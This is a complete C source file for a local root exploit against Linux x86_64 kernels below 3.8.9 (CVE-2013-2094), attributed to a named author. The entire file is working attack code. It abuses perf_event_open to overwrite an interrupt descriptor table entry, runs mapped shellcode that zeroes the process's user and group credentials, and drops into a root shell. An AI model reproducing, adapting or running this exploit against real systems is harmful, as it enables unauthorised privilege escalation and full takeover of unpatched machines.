/*
 * CVE-2013-2094 exploit x86_64 Linux < 3.8.9
 * by  (sorbo@darkircop.org) June 2013
 *
 * Based on sd's exploit.  Supports more targets.
 *
 */
 
#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/perf_event.h>
#include <signal.h>
#include <assert.h>
 
#define BASE        0x380000000
#define BASE_JUMP   0x1780000000
#define SIZE        0x10000000
#define KSIZE       0x2000000
 
#define TMP(x) (0xdeadbeef + (x))
 
struct idt {
    uint16_t limit;
    uint64_t addr;
} __attribute__((packed));
 
static int _fd;
 
static int perf_open(uint64_t off)
{
    struct perf_event_attr attr;
    int rc;
 
//  printf("perf open %lx [%d]\n", off, (int) off);
 
    memset(&attr, 0, sizeof(attr));
 
    attr.type           = PERF_TYPE_SOFTWARE;
    attr.size           = sizeof(attr);
    attr.config         = off;
    attr.mmap           = 1;
    attr.comm           = 1;
    attr.exclude_kernel = 1;
 
    rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);
 
    return rc;
}
 
void __sc_start(void);
void __sc_next(void);
 
void __sc(void)
{
    asm("__sc_start:\n"
        "call __sc_next\n"
        "iretq\n"
        "__sc_next:\n");
}
 
void sc(void)
{
    int i, j;
    uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));
    uint64_t kbase = ((uint64_t)current) >> 36;
    int uid = TMP(1);
    int gid = TMP(2);
 
    for (i = 0; i < 4000; i += 4) {
        uint64_t *p = (void *) &current[i];
        uint32_t *cred = (uint32_t*) p[0];
 
        if ((p[0] != p[1]) || ((p[0]>>36) != kbase))
            continue;
 
        for (j = 0; j < 20; j++) {
            if (cred[j] == uid && cred[j + 1] == gid) {
                for (i = 0; i < 8; i++) {
                    cred[j + i] = 0;
                    return;
                }
            }
        }
    }
}
 
static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)
{
    void *p;
 
    p = memmem(sc, 900, &needle, sizeof(needle));
    if (!p)
        errx(1, "can't find %x", needle);
 
    memcpy(p, &val, sizeof(val));
}
 
static void *map_mem(uint64_t addr)
{
    void *p;
 
    p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,
         MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
 
    if (p == MAP_FAILED)
        err(1, "mmap()");
 
    return p;
}
 
static int find_mem(void *mem, uint8_t c)
{
    int i;
    uint8_t *p = mem;
 
    for (i = 0; i < SIZE; i++) {
        if (p[i] == c)
            return i;
    }
 
    return -1;
}
 
static void dropshell()
{
    if (setuid(0) != 0)
        errx(1, "failed");
 
    printf("Launching shell\n");
 
    execl("/bin/sh", "sh", NULL);
    exit(0);
}
 
void morte(int x)
{
    printf("Got signal\n");
    close(_fd);
    dropshell();
}
 
static void trigger(int intr)
{
    switch (intr) {
    case 0:
        do {
            int z = 1;
            int a = 1;
 
            z--;
 
            a /= z;
        } while (0);
        break;
 
    case 4:
        asm("int $4");
        break;
 
    case 0x80:
        asm("int $0x80");
        break;
 
    default:
        errx(1, "unknown intr %d", intr);
    }
 
    sleep(3);
}
 
int main(int argc, char *argv[])
{
    uint32_t *p[2];
    int fd, i;
    uint64_t off;
    uint64_t addr = BASE;
    struct idt idt;
    uint8_t *kbase;
    int sz = 4;
    int intr = 4;
 
    printf("Searchin...\n");
 
    p[0] = map_mem(BASE);
    p[1] = map_mem(BASE_JUMP);
 
    memset(p[1], 0x69, SIZE);
 
    off = 0xFFFFFFFFL;
    fd = perf_open(off);
    close(fd);
 
    i = find_mem(p[0], 0xff);
    if (i == -1) {
        i = find_mem(p[1], 0x68);
 
        if (i == -1)
            errx(1, "Can't find overwrite");
 
        sz = 24;
        addr = BASE_JUMP;
        printf("detected CONFIG_JUMP_LABEL\n");
    }
 
    munmap(p[0], SIZE);
    munmap(p[1], SIZE);
 
    addr += i;
    addr -= off * sz;
 
    printf("perf_swevent_enabled is at 0x%lx\n", addr);
 
    asm("sidt %0" : "=m" (idt));
 
    printf("IDT at 0x%lx\n", idt.addr);
 
    off = addr - idt.addr;
    off -= 8;
 
    switch (off % sz) {
    case 0:
        intr = 0;
        break;
 
    case 8:
        intr = 0x80;
        break;
 
    case 16:
        intr = 4;
        break;
 
    default:
        errx(1, "remainder %d", off % sz);
    }
 
    printf("Using interrupt %d\n", intr);
 
    off -= 16 * intr;
 
    assert((off % sz) == 0);
 
    off /= sz;
    off = -off;
 
//  printf("Offset %lx\n", off);
 
    kbase = (uint8_t*) (idt.addr & 0xFF000000);
 
    printf("Shellcode at %p\n", kbase);
 
    if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
         MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)
        err(1, "mmap()");
 
    memset(kbase, 0x90, KSIZE);
    kbase += KSIZE - 1024;
 
    i = __sc_next - __sc_start;
    memcpy(kbase, __sc_start, i);
    kbase += i;
    memcpy(kbase, sc, 900);
 
    sc_replace(kbase, TMP(1), getuid());
    sc_replace(kbase, TMP(2), getgid());
 
    signal(SIGALRM, morte);
    alarm(2);
 
    printf("Triggering sploit\n");
    _fd = perf_open(off);
 
    trigger(intr);
 
    exit(0);
}